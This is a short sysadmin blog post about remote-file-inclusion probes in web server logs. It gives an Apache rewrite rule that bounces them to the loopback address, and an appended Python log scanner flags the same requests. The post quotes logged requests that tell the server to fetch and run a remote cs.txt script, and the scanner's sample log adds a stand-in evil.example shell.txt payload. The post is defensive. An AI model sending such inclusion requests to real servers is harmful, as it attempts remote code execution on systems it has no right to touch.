How to frustrate a trojan bot script


While doing some regular maintenance on some websites I manage, I came across some interesting entries in the logs for one of our servers: hundreds and hundreds of requests of the following kind, originating from a wide variety of IPs:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious CPU time on these attackers? Why not have them waste their own CPU time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and being given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a loopback address, a network standard which always points to yourself.

Here's what I put in httpd.conf, the Apache web server's configuration file, on the Linux server I wanted to modify:

RewriteEngine on
# Literal 'cs.txt?' anywhere in the query string ([NC] = case-insensitive); the
# dot and question mark are escaped so they are not treated as regex wildcards.
RewriteCond %{QUERY_STRING} cs\.txt\? [NC]
# 301 the request to the loopback address and stop rule processing ([L]).
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]

So now, whenever a request comes in whose URL contains the string 'cs.txt?', I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and, in essence, itself.

While the hits on the server continue, I have noticed they have slowed down; I'm assuming that's because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time on these trojan hits, and is letting them talk to themselves for a bit instead.
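As an added example (not code from the original post), here is a small log scanner that reproduces the post's RewriteCond against the request target and, going one step further, flags any query parameter whose value is a remote URL, which is the general shape of these remote-file-inclusion probes. The log lines, the 10.0.0.x client addresses and the evil.example host are constructed; the two cs.txt targets are the request shapes quoted above.

```python
import re
from collections import Counter

# Constructed sample lines in Apache common log format (not taken from the post's
# server); the two cs.txt targets are the request shapes quoted in the post.
SAMPLE_LOG = """\
10.0.0.1 - - [01/Jan/2006:10:00:00 +0000] "GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 404 512
10.0.0.2 - - [01/Jan/2006:10:00:01 +0000] "GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 512
10.0.0.1 - - [01/Jan/2006:10:00:02 +0000] "GET /modules.php?op=modload&name=News HTTP/1.1" 200 2048
10.0.0.3 - - [01/Jan/2006:10:00:03 +0000] "GET /index.php?page=https://evil.example/shell.txt? HTTP/1.1" 404 512
10.0.0.4 - - [01/Jan/2006:10:00:04 +0000] "GET /about.html HTTP/1.1" 200 1024
"""

# Common log format: client IP, identity, user, [timestamp], "METHOD target PROTO", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Equivalent of the post's RewriteCond with the metacharacters escaped ([NC] -> IGNORECASE).
PAGE_RULE_RE = re.compile(r'cs\.txt\?', re.IGNORECASE)
# Generalisation: any parameter whose value is an absolute remote URL.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def query_string(target):
    """Everything after the first '?' of the request target ('' if none)."""
    return target.partition('?')[2]

def matches_page_rule(target):
    """Would the post's RewriteCond fire for this request target?"""
    return PAGE_RULE_RE.search(query_string(target)) is not None

def is_rfi_attempt(target):
    """True if any query parameter value is a remote URL (remote-file-inclusion shape)."""
    for pair in query_string(target).split('&'):
        _, _, value = pair.partition('=')
        if REMOTE_URL_RE.match(value):
            return True
    return False

def scan(log_text):
    """Return the flagged (ip, target) pairs and a per-IP count of them."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group('target')):
            hits.append((m.group('ip'), m.group('target')))
    return hits, Counter(ip for ip, _ in hits)
```

Run `scan(SAMPLE_LOG)` on the constructed lines to get the three flagged requests and their per-IP counts; point it at a real access log to see which sources are probing and whether the cs.txt rule alone would catch them.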
